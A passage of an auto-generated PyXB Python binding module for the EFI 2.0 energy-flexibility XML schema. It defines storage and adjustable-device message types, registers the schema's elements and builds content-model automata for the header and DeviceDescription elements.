    __actuatorBehaviours = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuatorBehaviours'), 'actuatorBehaviours', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_33_httpwww_flexiblepower_orgefi_2actuatorBehaviours', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 685, 6), )
    actuatorBehaviours = property(__actuatorBehaviours.value, __actuatorBehaviours.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}leakageBehaviour uses Python identifier leakageBehaviour
    __leakageBehaviour = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'leakageBehaviour'), 'leakageBehaviour', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_33_httpwww_flexiblepower_orgefi_2leakageBehaviour', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 686, 6), )
    leakageBehaviour = property(__leakageBehaviour.value, __leakageBehaviour.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    _ElementMap.update({
        __actuatorBehaviours.name() : __actuatorBehaviours,
        __leakageBehaviour.name() : __leakageBehaviour
    })
    _AttributeMap.update({
    })
# Register the binding class in the module's type-binding registry.
_module_typeBindings.CTD_ANON_33 = CTD_ANON_33
# Complex type [anonymous] with content type ELEMENT_ONLY
# PyXB-generated binding (do not hand-edit): anonymous complexType that backs the
# StorageStatus element; extends StorageUpdate with currentFillLevel and
# actuatorStatuses.
class CTD_ANON_34 (StorageUpdate):
    """Complex type [anonymous] with content type ELEMENT_ONLY"""
    # Element-only content model: no simple-type value for this type.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type in the schema, hence no expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 731, 2)
    # Copy (not alias) the base maps so local additions don't mutate the base type.
    _ElementMap = StorageUpdate._ElementMap.copy()
    _AttributeMap = StorageUpdate._AttributeMap.copy()
    # Base type is StorageUpdate
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element {http://www.flexiblepower.org/efi-2}currentFillLevel uses Python identifier currentFillLevel
    __currentFillLevel = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'currentFillLevel'), 'currentFillLevel', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_34_httpwww_flexiblepower_orgefi_2currentFillLevel', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 735, 6), )
    currentFillLevel = property(__currentFillLevel.value, __currentFillLevel.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}actuatorStatuses uses Python identifier actuatorStatuses
    __actuatorStatuses = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuatorStatuses'), 'actuatorStatuses', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_34_httpwww_flexiblepower_orgefi_2actuatorStatuses', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 736, 6), )
    actuatorStatuses = property(__actuatorStatuses.value, __actuatorStatuses.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    _ElementMap.update({
        __currentFillLevel.name() : __currentFillLevel,
        __actuatorStatuses.name() : __actuatorStatuses
    })
    _AttributeMap.update({
    })
# Register the binding class in the module's type-binding registry.
_module_typeBindings.CTD_ANON_34 = CTD_ANON_34
# Complex type [anonymous] with content type ELEMENT_ONLY
# PyXB-generated binding (do not hand-edit): anonymous complexType that backs the
# StorageFillLevelTargetProfile element; extends StorageUpdate with targetProfile.
class CTD_ANON_35 (StorageUpdate):
    """Complex type [anonymous] with content type ELEMENT_ONLY"""
    # Element-only content model: no simple-type value for this type.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type in the schema, hence no expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 754, 2)
    # Copy (not alias) the base maps so local additions don't mutate the base type.
    _ElementMap = StorageUpdate._ElementMap.copy()
    _AttributeMap = StorageUpdate._AttributeMap.copy()
    # Base type is StorageUpdate
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element {http://www.flexiblepower.org/efi-2}targetProfile uses Python identifier targetProfile
    __targetProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'targetProfile'), 'targetProfile', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_35_httpwww_flexiblepower_orgefi_2targetProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 758, 6), )
    targetProfile = property(__targetProfile.value, __targetProfile.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    _ElementMap.update({
        __targetProfile.name() : __targetProfile
    })
    _AttributeMap.update({
    })
# Register the binding class in the module's type-binding registry.
_module_typeBindings.CTD_ANON_35 = CTD_ANON_35
# Complex type [anonymous] with content type ELEMENT_ONLY
# PyXB-generated binding (do not hand-edit): anonymous complexType that backs the
# StorageUsageForecast element; extends StorageUpdate with usageForecast.
class CTD_ANON_36 (StorageUpdate):
    """Complex type [anonymous] with content type ELEMENT_ONLY"""
    # Element-only content model: no simple-type value for this type.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type in the schema, hence no expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 765, 2)
    # Copy (not alias) the base maps so local additions don't mutate the base type.
    _ElementMap = StorageUpdate._ElementMap.copy()
    _AttributeMap = StorageUpdate._AttributeMap.copy()
    # Base type is StorageUpdate
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element {http://www.flexiblepower.org/efi-2}usageForecast uses Python identifier usageForecast
    __usageForecast = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'usageForecast'), 'usageForecast', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_36_httpwww_flexiblepower_orgefi_2usageForecast', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 769, 6), )
    usageForecast = property(__usageForecast.value, __usageForecast.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    _ElementMap.update({
        __usageForecast.name() : __usageForecast
    })
    _AttributeMap.update({
    })
# Register the binding class in the module's type-binding registry.
_module_typeBindings.CTD_ANON_36 = CTD_ANON_36
# Complex type [anonymous] with content type ELEMENT_ONLY
# PyXB-generated binding (do not hand-edit): anonymous complexType that backs the
# AdjustableSystemDescription element; extends AdjustableUpdate with runningModes,
# timers and transitions.
class CTD_ANON_37 (AdjustableUpdate):
    """Complex type [anonymous] with content type ELEMENT_ONLY"""
    # Element-only content model: no simple-type value for this type.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type in the schema, hence no expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 879, 2)
    # Copy (not alias) the base maps so local additions don't mutate the base type.
    _ElementMap = AdjustableUpdate._ElementMap.copy()
    _AttributeMap = AdjustableUpdate._AttributeMap.copy()
    # Base type is AdjustableUpdate
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element {http://www.flexiblepower.org/efi-2}runningModes uses Python identifier runningModes
    __runningModes = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModes'), 'runningModes', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_37_httpwww_flexiblepower_orgefi_2runningModes', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 883, 6), )
    runningModes = property(__runningModes.value, __runningModes.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}timers uses Python identifier timers
    __timers = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timers'), 'timers', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_37_httpwww_flexiblepower_orgefi_2timers', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 884, 6), )
    timers = property(__timers.value, __timers.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}transitions uses Python identifier transitions
    __transitions = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'transitions'), 'transitions', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_37_httpwww_flexiblepower_orgefi_2transitions', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 885, 6), )
    transitions = property(__transitions.value, __transitions.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    _ElementMap.update({
        __runningModes.name() : __runningModes,
        __timers.name() : __timers,
        __transitions.name() : __transitions
    })
    _AttributeMap.update({
    })
# Register the binding class in the module's type-binding registry.
_module_typeBindings.CTD_ANON_37 = CTD_ANON_37
# Complex type [anonymous] with content type ELEMENT_ONLY
# PyXB-generated binding (do not hand-edit): anonymous complexType that backs the
# AdjustableStatus element; extends AdjustableUpdate with currentRunningModeId,
# runningModeFactor, previousRunningModeId, transitionTimestamp and timerUpdates.
class CTD_ANON_38 (AdjustableUpdate):
    """Complex type [anonymous] with content type ELEMENT_ONLY"""
    # Element-only content model: no simple-type value for this type.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type in the schema, hence no expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 897, 2)
    # Copy (not alias) the base maps so local additions don't mutate the base type.
    _ElementMap = AdjustableUpdate._ElementMap.copy()
    _AttributeMap = AdjustableUpdate._AttributeMap.copy()
    # Base type is AdjustableUpdate
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element {http://www.flexiblepower.org/efi-2}currentRunningModeId uses Python identifier currentRunningModeId
    __currentRunningModeId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'currentRunningModeId'), 'currentRunningModeId', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_38_httpwww_flexiblepower_orgefi_2currentRunningModeId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 901, 6), )
    currentRunningModeId = property(__currentRunningModeId.value, __currentRunningModeId.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}runningModeFactor uses Python identifier runningModeFactor
    __runningModeFactor = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), 'runningModeFactor', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_38_httpwww_flexiblepower_orgefi_2runningModeFactor', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 902, 6), )
    runningModeFactor = property(__runningModeFactor.value, __runningModeFactor.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}previousRunningModeId uses Python identifier previousRunningModeId
    __previousRunningModeId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'previousRunningModeId'), 'previousRunningModeId', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_38_httpwww_flexiblepower_orgefi_2previousRunningModeId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 910, 6), )
    previousRunningModeId = property(__previousRunningModeId.value, __previousRunningModeId.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}transitionTimestamp uses Python identifier transitionTimestamp
    __transitionTimestamp = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'transitionTimestamp'), 'transitionTimestamp', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_38_httpwww_flexiblepower_orgefi_2transitionTimestamp', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 911, 6), )
    transitionTimestamp = property(__transitionTimestamp.value, __transitionTimestamp.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}timerUpdates uses Python identifier timerUpdates
    __timerUpdates = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timerUpdates'), 'timerUpdates', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_38_httpwww_flexiblepower_orgefi_2timerUpdates', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 912, 6), )
    timerUpdates = property(__timerUpdates.value, __timerUpdates.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    _ElementMap.update({
        __currentRunningModeId.name() : __currentRunningModeId,
        __runningModeFactor.name() : __runningModeFactor,
        __previousRunningModeId.name() : __previousRunningModeId,
        __transitionTimestamp.name() : __transitionTimestamp,
        __timerUpdates.name() : __timerUpdates
    })
    _AttributeMap.update({
    })
# Register the binding class in the module's type-binding registry.
_module_typeBindings.CTD_ANON_38 = CTD_ANON_38
# PyXB-generated top-level element bindings (do not hand-edit). Each statement
# pairs a global schema element with its (often anonymous) complex-type binding
# class and registers it in the namespace category map so document parsing can
# resolve the element to its binding.
InstructionStatusUpdate = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'InstructionStatusUpdate'), CTD_ANON_12, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 74, 1))
Namespace.addCategoryObject('elementBinding', InstructionStatusUpdate.name().localName(), InstructionStatusUpdate)
FlexibilityRevoke = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'FlexibilityRevoke'), CTD_ANON_13, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 96, 1))
Namespace.addCategoryObject('elementBinding', FlexibilityRevoke.name().localName(), FlexibilityRevoke)
InstructionRevoke = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'InstructionRevoke'), CTD_ANON_14, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 103, 1))
Namespace.addCategoryObject('elementBinding', InstructionRevoke.name().localName(), InstructionRevoke)
Measurement = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Measurement'), CTD_ANON_15, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 252, 1))
Namespace.addCategoryObject('elementBinding', Measurement.name().localName(), Measurement)
InflexibleRegistration = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'InflexibleRegistration'), CTD_ANON_22, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 215, 1))
Namespace.addCategoryObject('elementBinding', InflexibleRegistration.name().localName(), InflexibleRegistration)
InflexibleInstruction = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'InflexibleInstruction'), CTD_ANON_23, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 318, 1))
Namespace.addCategoryObject('elementBinding', InflexibleInstruction.name().localName(), InflexibleInstruction)
ShiftableRegistration = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ShiftableRegistration'), CTD_ANON_24, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 340, 1))
Namespace.addCategoryObject('elementBinding', ShiftableRegistration.name().localName(), ShiftableRegistration)
ShiftableUpdate = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ShiftableUpdate'), CTD_ANON_25, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 375, 1))
Namespace.addCategoryObject('elementBinding', ShiftableUpdate.name().localName(), ShiftableUpdate)
ShiftableInstruction = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ShiftableInstruction'), CTD_ANON_26, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 399, 1))
Namespace.addCategoryObject('elementBinding', ShiftableInstruction.name().localName(), ShiftableInstruction)
StorageRegistration = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'StorageRegistration'), CTD_ANON_27, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 410, 1))
Namespace.addCategoryObject('elementBinding', StorageRegistration.name().localName(), StorageRegistration)
StorageInstruction = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'StorageInstruction'), CTD_ANON_28, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 802, 1))
Namespace.addCategoryObject('elementBinding', StorageInstruction.name().localName(), StorageInstruction)
AdjustableRegistration = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AdjustableRegistration'), CTD_ANON_29, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 813, 1))
Namespace.addCategoryObject('elementBinding', AdjustableRegistration.name().localName(), AdjustableRegistration)
AdjustableInstruction = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AdjustableInstruction'), CTD_ANON_30, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 918, 1))
Namespace.addCategoryObject('elementBinding', AdjustableInstruction.name().localName(), AdjustableInstruction)
InflexibleForecast = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'InflexibleForecast'), CTD_ANON_31, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 280, 1))
Namespace.addCategoryObject('elementBinding', InflexibleForecast.name().localName(), InflexibleForecast)
InflexibleCurtailmentOptions = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'InflexibleCurtailmentOptions'), CTD_ANON_32, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 307, 1))
Namespace.addCategoryObject('elementBinding', InflexibleCurtailmentOptions.name().localName(), InflexibleCurtailmentOptions)
StorageSystemDescription = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'StorageSystemDescription'), CTD_ANON_33, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 680, 1))
Namespace.addCategoryObject('elementBinding', StorageSystemDescription.name().localName(), StorageSystemDescription)
StorageStatus = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'StorageStatus'), CTD_ANON_34, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 730, 1))
Namespace.addCategoryObject('elementBinding', StorageStatus.name().localName(), StorageStatus)
StorageFillLevelTargetProfile = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'StorageFillLevelTargetProfile'), CTD_ANON_35, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 753, 1))
Namespace.addCategoryObject('elementBinding', StorageFillLevelTargetProfile.name().localName(), StorageFillLevelTargetProfile)
StorageUsageForecast = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'StorageUsageForecast'), CTD_ANON_36, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 764, 1))
Namespace.addCategoryObject('elementBinding', StorageUsageForecast.name().localName(), StorageUsageForecast)
AdjustableSystemDescription = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AdjustableSystemDescription'), CTD_ANON_37, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 878, 1))
Namespace.addCategoryObject('elementBinding', AdjustableSystemDescription.name().localName(), AdjustableSystemDescription)
AdjustableStatus = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AdjustableStatus'), CTD_ANON_38, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 896, 1))
Namespace.addCategoryObject('elementBinding', AdjustableStatus.name().localName(), AdjustableStatus)
# Attach the local 'header' element declaration to the EfiMessage content model.
EfiMessage._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'header'), CTD_ANON, scope=EfiMessage, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3)))

def _BuildAutomaton ():
    """Build the finite-automaton content model for EfiMessage.

    The model is a single mandatory 'header' element: one non-final initial
    state with no outgoing transitions (the final-update set marks it final
    after the symbol is consumed).
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton
    del _BuildAutomaton
    import pyxb.utils.fac as fac
    counters = set()
    states = []
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(EfiMessage._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    transitions = []
    st_0._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Build once and discard the helper (it deletes itself via the global/del above).
EfiMessage._Automaton = _BuildAutomaton()
# Attach the local element declarations for the header type (CTD_ANON):
# a required efiResourceId followed by a required timestamp.
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'efiResourceId'), Identifier, scope=CTD_ANON, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 27, 6)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timestamp'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 28, 6)))

def _BuildAutomaton_ ():
    """Build the finite-automaton content model for CTD_ANON (the header type).

    Sequence of exactly two elements: efiResourceId (non-final state) then
    timestamp (final state); a single unconditional transition links them.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_
    del _BuildAutomaton_
    import pyxb.utils.fac as fac
    counters = set()
    states = []
    # final_update None => st_0 is not an accepting state (efiResourceId alone is incomplete).
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'efiResourceId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 27, 6))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'timestamp')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 28, 6))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    st_1._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Build once and discard the helper (it deletes itself via the global/del above).
CTD_ANON._Automaton = _BuildAutomaton_()
# Children of DeviceDescription: 'deviceClass', then 'serialNumber' and
# 'label' whose occurrence is bounded by the counters built below.
DeviceDescription._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'deviceClass'), DeviceClass, scope=DeviceDescription, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 37, 3)))
DeviceDescription._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'serialNumber'), pyxb.binding.datatypes.string, scope=DeviceDescription, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 38, 3)))
DeviceDescription._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'label'), pyxb.binding.datatypes.string, scope=DeviceDescription, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 39, 3)))
def _BuildAutomaton_2 ():
    # Build the automaton for DeviceDescription's ordered content model.
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_2
    del _BuildAutomaton_2
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0: occurrence counter (min=0, max=1) for 'serialNumber' (XSD 38,3).
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 38, 3))
    counters.add(cc_0)
    # cc_1: occurrence counter (min=0, max=1) for 'label' (XSD 39,3).
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 39, 3))
    counters.add(cc_1)
    states = []
    # st_0: 'deviceClass' — initial and accepting.
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(DeviceDescription._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'deviceClass')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 37, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: 'serialNumber' — accepting after closing counter cc_0.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(DeviceDescription._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'serialNumber')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 38, 3))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2: 'label' — accepting after closing counter cc_1.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(DeviceDescription._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'label')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 39, 3))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # From st_0 either optional child may follow.
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    transitions.append(fac.Transition(st_2, [
        ]))
    st_0._set_transitionSet(transitions)
    # From st_1: repeat within cc_0's bound, or close cc_0 and move to 'label'.
    transitions = []
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_1._set_transitionSet(transitions)
    # From st_2: repeat within cc_1's bound.
    transitions = []
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_1, True) ]))
    st_2._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
DeviceDescription._Automaton = _BuildAutomaton_2()
